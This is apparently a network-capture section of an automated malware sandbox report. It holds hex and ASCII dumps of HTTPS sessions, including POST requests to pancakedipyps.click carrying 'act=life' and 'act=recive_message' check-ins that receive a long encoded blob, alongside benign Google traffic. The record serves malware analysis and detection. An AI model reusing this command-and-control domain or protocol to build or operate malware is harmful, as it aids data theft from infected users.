                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Content-Length: 8
                                                                                                                                                                                                                                                            Host: pancakedipyps.click
                                                                                                                                                                                                                                                            2024-12-21 21:19:10 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                                            Data Ascii: act=life
                                                                                                                                                                                                                                                            2024-12-21 21:19:10 UTC1125INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:19:10 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=4l7vj7bsjldqnh58hhmjdq06vb; expires=Wed, 16 Apr 2025 15:05:49 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Sr68FZqB3e2nxQLwcagQgxM2fNzAj3JL1L9Po60%2Bg2%2B4KgkNtV8MXlJ4guDn%2FjgvO4lJQPDw7yjLBZrQzusGQwcIKUvPbK1wkLnqXZlSbvjKedTpJiJ8Q6K3W9BhglzTnhJmuJ98"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8f5ae8a8f8cf42e3-EWR
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1569&min_rtt=1553&rtt_var=615&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=910&delivery_rate=1731909&cwnd=204&unsent_bytes=0&cid=016b924e2177e51b&ts=778&x=0"
                                                                                                                                                                                                                                                            2024-12-21 21:19:10 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 2ok
                                                                                                                                                                                                                                                            2024-12-21 21:19:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                            73192.168.2.450082172.67.209.202443
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-12-21 21:19:12 UTC267OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Content-Length: 46
                                                                                                                                                                                                                                                            Host: pancakedipyps.click
                                                                                                                                                                                                                                                            2024-12-21 21:19:12 UTC46OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 46 41 54 45 39 39 2d 2d 74 65 73 74 26 6a 3d
                                                                                                                                                                                                                                                            Data Ascii: act=recive_message&ver=4.0&lid=FATE99--test&j=
                                                                                                                                                                                                                                                            2024-12-21 21:19:13 UTC1135INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:19:13 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=s5f7h5aoj8sjv7h2uml95i330a; expires=Wed, 16 Apr 2025 15:05:52 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WRkN97d0njg6AAyUSgwLHl%2F%2FLmWqBMRGhXItaoBD%2FRlsM1C10vfkcGlG8nGmHike0Vwk3bakpgBiDukpbsQ%2Fd9G2h6%2F%2B7dpw4PTB436J7c%2BZk%2F6UzHD3QgJlGKKDbspmSErmN4Y1"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8f5ae8bb3df71835-EWR
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1477&min_rtt=1463&rtt_var=578&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=949&delivery_rate=1846932&cwnd=139&unsent_bytes=0&cid=c089255c0d754eb7&ts=765&x=0"
                                                                                                                                                                                                                                                            2024-12-21 21:19:13 UTC234INData Raw: 31 63 61 65 0d 0a 41 6d 36 61 79 41 38 2f 38 69 33 37 76 7a 63 46 39 79 53 4e 41 74 4a 79 52 55 49 38 2b 38 43 52 55 2f 35 4b 63 59 38 68 4e 70 35 35 54 4f 7a 71 4e 51 76 65 44 34 6a 61 46 54 2b 44 56 76 68 6e 2f 6c 41 6b 4a 68 37 42 70 76 41 2f 6a 53 39 64 72 56 64 62 76 44 67 49 2b 36 52 38 57 74 34 50 6e 73 63 56 50 36 78 66 72 32 65 38 55 48 39 67 57 5a 47 69 38 44 2b 63 4b 78 72 67 55 56 72 39 61 67 4c 39 6f 47 70 63 6c 6b 79 58 30 6c 4a 67 6b 6b 58 6e 62 4c 73 66 4c 53 38 65 31 2b 4c 30 4b 64 78 77 55 38 4a 45 51 76 39 50 44 2b 6d 6a 4c 55 4c 65 56 74 6e 61 57 53 66 4e 42 75 78 6e 73 42 34 6a 4a 6c 65 54 71 50 6b 33 6e 53 34 62 2f 30 68 51 39 6d 6f 4d 2f 71 46 67 56 59 4a 42 6e 64 56 5a
                                                                                                                                                                                                                                                            Data Ascii: 1caeAm6ayA8/8i37vzcF9ySNAtJyRUI8+8CRU/5KcY8hNp55TOzqNQveD4jaFT+DVvhn/lAkJh7BpvA/jS9drVdbvDgI+6R8Wt4PnscVP6xfr2e8UH9gWZGi8D+cKxrgUVr9agL9oGpclkyX0lJgkkXnbLsfLS8e1+L0KdxwU8JEQv9PD+mjLULeVtnaWSfNBuxnsB4jJleTqPk3nS4b/0hQ9moM/qFgVYJBndVZ
                                                                                                                                                                                                                                                            2024-12-21 21:19:13 UTC1369INData Raw: 5a 70 68 46 72 79 37 77 46 7a 39 67 42 74 6e 78 77 54 4b 4e 4f 51 62 67 55 31 4b 38 66 30 4c 68 36 6d 70 52 30 42 66 5a 31 56 6c 70 6b 45 58 67 5a 37 45 51 4e 53 39 65 6d 71 72 37 4e 5a 59 6e 48 4f 4a 4e 58 76 74 6f 42 66 2b 6c 61 6c 57 57 51 4a 71 64 47 79 65 53 58 71 38 34 38 44 41 33 49 31 32 4e 72 2b 4a 78 67 32 59 4b 72 55 52 59 76 44 68 4d 2f 71 52 73 55 4a 42 64 6b 64 5a 65 59 6f 64 4e 35 6d 32 39 45 43 6f 71 55 5a 71 69 39 44 75 57 4a 78 6e 70 54 6c 6e 36 59 41 79 34 35 43 31 61 69 41 2f 42 6e 58 5a 69 68 55 48 6a 64 76 49 71 5a 7a 38 51 67 4f 4c 30 50 64 78 77 55 2b 56 47 56 2f 39 72 41 2f 75 69 5a 6b 2b 51 58 5a 2f 51 55 48 57 54 51 2b 46 71 73 77 49 74 4c 6c 69 61 71 2f 67 34 6d 53 38 58 72 51 30 55 2b 33 68 4d 6f 4f 70 4d 55 4a 74 44 6b 38 70
                                                                                                                                                                                                                                                            Data Ascii: ZphFry7wFz9gBtnxwTKNOQbgU1K8f0Lh6mpR0BfZ1VlpkEXgZ7EQNS9emqr7NZYnHOJNXvtoBf+lalWWQJqdGyeSXq848DA3I12Nr+Jxg2YKrURYvDhM/qRsUJBdkdZeYodN5m29ECoqUZqi9DuWJxnpTln6YAy45C1aiA/BnXZihUHjdvIqZz8QgOL0PdxwU+VGV/9rA/uiZk+QXZ/QUHWTQ+FqswItLliaq/g4mS8XrQ0U+3hMoOpMUJtDk8p
                                                                                                                                                                                                                                                            2024-12-21 21:19:13 UTC1369INData Raw: 50 31 67 76 41 49 72 4b 6c 69 57 72 2f 39 78 30 6d 67 55 39 51 4d 4d 76 45 6f 50 37 4b 6c 6e 48 36 56 4d 6c 39 4e 53 63 64 56 5a 6f 58 6e 77 46 79 74 67 42 74 6d 76 38 6a 6d 61 4f 68 7a 67 51 46 72 79 62 77 6e 33 6f 6d 31 64 6e 55 71 64 31 6c 35 6b 6d 45 4c 39 61 72 41 59 49 69 46 55 6b 2b 4b 39 63 5a 73 77 55 37 55 44 5a 65 74 72 54 73 32 70 59 31 4f 58 57 64 6e 43 47 33 37 56 51 65 4d 67 36 46 41 71 4b 46 75 63 72 66 49 37 6b 69 30 5a 34 55 74 61 2f 33 49 44 2f 4b 70 68 56 5a 70 43 6c 39 6c 64 62 70 35 4e 36 57 43 78 47 6d 64 75 48 70 36 36 73 32 6e 63 48 42 54 68 54 6c 75 2b 56 51 2f 32 70 47 70 4c 30 46 44 58 78 42 56 67 6d 51 61 33 49 4c 77 5a 4a 79 74 55 6e 61 4c 30 50 4a 6b 72 46 4f 35 4f 55 2f 5a 75 43 2f 79 6d 5a 46 43 57 54 35 37 5a 55 48 57 51
                                                                                                                                                                                                                                                            Data Ascii: P1gvAIrKliWr/9x0mgU9QMMvEoP7KlnH6VMl9NScdVZoXnwFytgBtmv8jmaOhzgQFrybwn3om1dnUqd1l5kmEL9arAYIiFUk+K9cZswU7UDZetrTs2pY1OXWdnCG37VQeMg6FAqKFucrfI7ki0Z4Uta/3ID/KphVZpCl9ldbp5N6WCxGmduHp66s2ncHBThTlu+VQ/2pGpL0FDXxBVgmQa3ILwZJytUnaL0PJkrFO5OU/ZuC/ymZFCWT57ZUHWQ
                                                                                                                                                                                                                                                            2024-12-21 21:19:13 UTC1369INData Raw: 73 6c 4b 54 59 65 68 75 7a 71 63 5a 73 6b 55 37 55 44 58 66 56 79 41 76 61 6a 59 46 75 59 53 4a 66 51 58 6d 47 65 51 65 68 6d 76 52 67 71 4a 56 32 59 70 76 6b 6a 6e 79 4d 5a 34 45 6b 55 73 69 41 4c 34 4f 6f 31 48 62 64 44 73 4d 31 4f 64 59 4d 47 38 43 36 70 55 43 41 73 48 73 48 69 38 44 36 56 4a 78 76 6c 54 46 76 34 62 67 72 2b 70 32 68 53 6d 6c 32 52 30 31 68 73 6d 6b 33 39 59 4c 30 55 4b 79 52 57 6b 71 69 7a 66 39 77 76 43 36 30 62 46 4d 6c 74 41 2f 69 70 65 78 32 50 41 59 43 64 55 6d 76 56 48 71 39 73 76 68 41 6f 4c 46 4b 53 71 76 49 39 6b 69 38 57 35 45 74 63 37 6d 45 49 38 4b 74 6a 55 70 46 4c 6e 4e 68 52 59 4a 46 41 34 43 44 2b 55 43 41 34 48 73 48 69 33 42 61 70 61 6a 4c 58 41 30 75 79 65 55 7a 2f 70 69 30 46 30 45 4f 61 30 56 31 6f 6b 30 2f 6a 61
                                                                                                                                                                                                                                                            Data Ascii: slKTYehuzqcZskU7UDXfVyAvajYFuYSJfQXmGeQehmvRgqJV2YpvkjnyMZ4EkUsiAL4Oo1HbdDsM1OdYMG8C6pUCAsHsHi8D6VJxvlTFv4bgr+p2hSml2R01hsmk39YL0UKyRWkqizf9wvC60bFMltA/ipex2PAYCdUmvVHq9svhAoLFKSqvI9ki8W5Etc7mEI8KtjUpFLnNhRYJFA4CD+UCA4HsHi3BapajLXA0uyeUz/pi0F0EOa0V1ok0/ja
                                                                                                                                                                                                                                                            2024-12-21 21:19:13 UTC1369INData Raw: 71 56 5a 32 68 39 7a 53 54 4b 52 4c 72 55 56 50 31 63 67 4c 31 70 57 56 56 6d 55 36 64 32 46 68 68 6d 55 7a 75 5a 37 34 65 4c 32 41 51 32 61 58 72 63 63 52 6f 4d 76 31 59 52 75 70 74 4c 66 57 6c 4c 55 4c 65 56 74 6e 61 57 53 66 4e 42 75 5a 79 74 42 30 31 4b 56 6d 58 72 66 41 6a 6e 53 55 59 2f 30 52 62 2b 47 63 41 2f 71 56 72 58 4a 56 46 6c 64 70 51 62 4a 70 4b 72 79 37 77 46 7a 39 67 42 74 6d 4d 2b 43 4b 4c 4b 78 33 6d 56 55 2b 38 66 30 4c 68 36 6d 70 52 30 42 66 5a 33 6c 35 73 6b 55 62 6a 59 4c 51 64 4a 7a 4a 52 6e 71 58 36 4f 6f 34 69 46 4f 70 49 58 50 64 76 43 75 71 6d 59 30 2b 56 58 59 75 64 47 79 65 53 58 71 38 34 38 43 59 67 4d 45 36 61 34 4d 49 6e 6e 7a 34 59 34 45 38 55 34 79 34 56 75 4b 31 68 48 63 67 50 6e 39 4a 63 5a 4a 70 48 35 6d 79 39 46 53
                                                                                                                                                                                                                                                            Data Ascii: qVZ2h9zSTKRLrUVP1cgL1pWVVmU6d2FhhmUzuZ74eL2AQ2aXrccRoMv1YRuptLfWlLULeVtnaWSfNBuZytB01KVmXrfAjnSUY/0Rb+GcA/qVrXJVFldpQbJpKry7wFz9gBtmM+CKLKx3mVU+8f0Lh6mpR0BfZ3l5skUbjYLQdJzJRnqX6Oo4iFOpIXPdvCuqmY0+VXYudGyeSXq848CYgME6a4MInnz4Y4E8U4y4VuK1hHcgPn9JcZJpH5my9FS
                                                                                                                                                                                                                                                            2024-12-21 21:19:13 UTC1369INData Raw: 6d 76 67 2f 72 69 73 49 72 56 77 61 35 53 41 4c 39 4f 6f 31 48 5a 4e 49 6d 74 78 66 62 70 6c 4a 36 47 53 69 47 69 41 79 58 35 69 70 2f 6a 32 63 4a 52 37 6e 51 6c 33 78 62 41 48 2f 72 57 4a 59 30 41 48 5a 32 6b 30 6e 7a 51 62 4f 62 62 73 63 66 48 6f 65 68 75 7a 71 63 5a 73 6b 55 37 55 44 56 50 5a 6c 42 76 57 70 59 6c 36 43 54 70 2f 50 56 57 71 66 56 4f 56 72 74 52 30 71 4c 56 32 66 70 50 67 39 6a 69 45 54 37 6b 67 55 73 69 41 4c 34 4f 6f 31 48 62 4e 59 6a 39 64 53 61 34 4e 4e 37 6d 4f 6d 48 54 64 67 45 4e 6d 7a 39 43 44 63 63 41 58 39 56 46 50 6a 4c 68 57 34 72 57 45 64 79 41 2b 66 31 46 4e 67 6b 30 6a 39 5a 62 59 66 4b 43 6c 58 6e 61 72 77 4d 5a 67 73 46 4f 68 41 57 50 64 6e 44 2f 65 75 5a 46 4f 5a 51 4e 6d 54 46 57 43 4e 42 72 63 67 6b 51 73 6b 4c 46 50
                                                                                                                                                                                                                                                            Data Ascii: mvg/risIrVwa5SAL9Oo1HZNImtxfbplJ6GSiGiAyX5ip/j2cJR7nQl3xbAH/rWJY0AHZ2k0nzQbObbscfHoehuzqcZskU7UDVPZlBvWpYl6CTp/PVWqfVOVrtR0qLV2fpPg9jiET7kgUsiAL4Oo1HbNYj9dSa4NN7mOmHTdgENmz9CDccAX9VFPjLhW4rWEdyA+f1FNgk0j9ZbYfKClXnarwMZgsFOhAWPdnD/euZFOZQNmTFWCNBrcgkQskLFP
                                                                                                                                                                                                                                                            2024-12-21 21:19:13 UTC271INData Raw: 70 56 6f 58 61 31 45 54 4c 77 34 54 4e 69 68 65 31 69 58 57 64 76 6f 56 6d 6d 62 51 66 6b 67 72 79 39 70 59 46 47 44 34 71 73 49 68 57 67 55 34 51 4d 4d 76 48 55 4c 2b 4b 31 33 53 35 64 44 69 4e 5a 59 61 37 64 4a 36 48 61 7a 48 79 51 78 56 39 57 70 2f 6e 48 53 61 42 54 31 41 77 79 38 54 77 76 75 71 55 4a 65 67 55 62 5a 6b 78 56 67 67 77 61 33 49 49 35 51 4e 53 4e 4f 6d 71 33 69 44 39 78 77 43 74 4d 44 58 2b 70 6e 48 50 75 38 5a 6c 43 63 58 71 65 64 44 54 50 48 46 4c 30 79 34 67 39 6e 50 32 48 58 34 76 4a 78 78 42 45 4b 72 56 55 55 70 44 4a 43 75 4c 67 74 42 64 41 49 6d 73 39 48 59 5a 5a 51 37 43 65 4f 4c 67 41 32 56 4a 36 79 39 43 61 54 61 46 32 74 54 42 53 6b 57 55 7a 78 72 58 5a 4d 68 6b 4b 4a 32 68 56 59 32 77 62 33 49 4f 68 51 45 69 4e 51 6c 36 58 6c
                                                                                                                                                                                                                                                            Data Ascii: pVoXa1ETLw4TNihe1iXWdvoVmmbQfkgry9pYFGD4qsIhWgU4QMMvHUL+K13S5dDiNZYa7dJ6HazHyQxV9Wp/nHSaBT1Awy8TwvuqUJegUbZkxVggwa3II5QNSNOmq3iD9xwCtMDX+pnHPu8ZlCcXqedDTPHFL0y4g9nP2HX4vJxxBEKrVUUpDJCuLgtBdAIms9HYZZQ7CeOLgA2VJ6y9CaTaF2tTBSkWUzxrXZMhkKJ2hVY2wb3IOhQEiNQl6Xl
                                                                                                                                                                                                                                                            2024-12-21 21:19:13 UTC1369INData Raw: 32 63 36 65 0d 0a 6a 6b 4c 56 76 51 46 38 71 54 46 57 4f 45 42 72 63 77 34 6b 74 79 63 77 6e 4a 38 4f 78 2f 68 57 67 46 72 52 73 47 73 69 41 65 75 50 49 74 47 70 4e 64 69 39 74 57 63 5a 59 42 30 56 36 58 43 69 6f 6d 53 59 69 63 7a 54 61 47 4a 52 58 36 55 68 6a 70 59 77 4c 32 72 58 73 64 33 67 2b 57 6e 51 31 65 31 51 36 76 58 2f 35 51 50 32 41 47 32 5a 66 77 50 35 49 76 42 66 77 4f 63 2b 5a 74 43 75 2b 37 4c 52 50 51 53 64 6d 46 42 53 6e 56 51 76 34 67 36 45 42 31 65 77 76 4b 39 61 4e 6a 67 32 59 4b 72 56 55 55 70 44 4a 43 75 4c 67 74 42 64 41 49 6d 73 39 48 59 5a 5a 51 37 43 65 4f 4c 67 6b 6e 57 4a 79 6c 34 33 4f 79 49 77 66 71 41 78 71 38 62 30 79 67 6b 79 30 56 30 48 44 58 6e 55 30 6e 7a 51 62 61 59 37 34 65 49 44 5a 50 31 49 7a 30 4e 35 6b 76 41 36 39
                                                                                                                                                                                                                                                            Data Ascii: 2c6ejkLVvQF8qTFWOEBrcw4ktycwnJ8Ox/hWgFrRsGsiAeuPItGpNdi9tWcZYB0V6XCiomSYiczTaGJRX6UhjpYwL2rXsd3g+WnQ1e1Q6vX/5QP2AG2ZfwP5IvBfwOc+ZtCu+7LRPQSdmFBSnVQv4g6EB1ewvK9aNjg2YKrVUUpDJCuLgtBdAIms9HYZZQ7CeOLgknWJyl43OyIwfqAxq8b0ygky0V0HDXnU0nzQbaY74eIDZP1Iz0N5kvA69
                                                                                                                                                                                                                                                            2024-12-21 21:19:13 UTC1369INData Raw: 46 36 32 36 6e 38 64 79 41 2f 65 33 6b 64 31 6b 30 58 35 59 2f 63 75 47 51 64 51 6e 71 50 6c 49 59 73 6e 58 4d 4e 31 64 63 4a 65 47 66 75 6b 59 31 71 47 58 74 6d 54 46 57 6a 56 48 74 59 67 2b 46 41 59 62 68 36 42 34 71 74 78 71 53 73 64 34 30 52 43 37 53 30 72 39 71 31 73 53 34 42 59 6c 70 4a 37 55 62 51 47 6f 53 43 32 55 48 39 79 45 4e 6d 6d 34 6e 48 45 65 45 47 32 46 67 65 72 4d 46 37 6e 35 48 51 64 68 67 2f 42 6a 78 73 6e 68 77 61 33 49 50 63 54 4e 54 4a 59 6d 72 54 77 64 71 49 57 4e 4f 4e 45 56 65 70 77 41 66 53 4c 62 6b 79 61 63 61 66 49 56 6d 6d 62 51 66 6c 78 38 46 35 6e 4c 78 37 42 6d 37 4e 35 33 42 64 64 72 56 73 55 70 43 41 35 2b 36 52 6a 57 6f 5a 65 31 50 70 62 59 4a 52 51 2f 32 32 38 4d 53 51 78 56 4e 6e 73 73 7a 66 63 63 45 47 6a 41 31 44 74
                                                                                                                                                                                                                                                            Data Ascii: F626n8dyA/e3kd1k0X5Y/cuGQdQnqPlIYsnXMN1dcJeGfukY1qGXtmTFWjVHtYg+FAYbh6B4qtxqSsd40RC7S0r9q1sS4BYlpJ7UbQGoSC2UH9yENmm4nHEeEG2FgerMF7n5HQdhg/Bjxsnhwa3IPcTNTJYmrTwdqIWNONEVepwAfSLbkyacafIVmmbQflx8F5nLx7Bm7N53BddrVsUpCA5+6RjWoZe1PpbYJRQ/228MSQxVNnsszfccEGjA1Dt


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                            74192.168.2.450086142.250.181.132443
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-12-21 21:19:14 UTC353OUTGET /async/ddljson?async=ntp:2 HTTP/1.1
                                                                                                                                                                                                                                                            Host: www.google.com
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                            75192.168.2.450084142.250.181.132443
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-12-21 21:19:14 UTC510OUTGET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
                                                                                                                                                                                                                                                            Host: www.google.com
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                                                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                            2024-12-21 21:19:14 UTC1018INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Version: 705503573
                                                                                                                                                                                                                                                            Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                            Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                            Permissions-Policy: unload=()
                                                                                                                                                                                                                                                            Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:19:14 GMT
                                                                                                                                                                                                                                                            Server: gws
                                                                                                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                            Accept-Ranges: none
                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            2024-12-21 21:19:14 UTC372INData Raw: 31 37 36 65 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 61 20 67 62 5f 32 64 20 67 62 5f 51 65 20 67 62 5f 71 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65
                                                                                                                                                                                                                                                            Data Ascii: 176e)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e
                                                                                                                                                                                                                                                            2024-12-21 21:19:14 UTC1390INData Raw: 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 72 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4a 63 20 67 62 5f 51 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 76 67 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 76 69 65 77 62 6f 78 5c 75 30 30 33 64 5c 22 30 20 30 20 32 34 20 32 34 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30
                                                                                                                                                                                                                                                            Data Ascii: class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u0
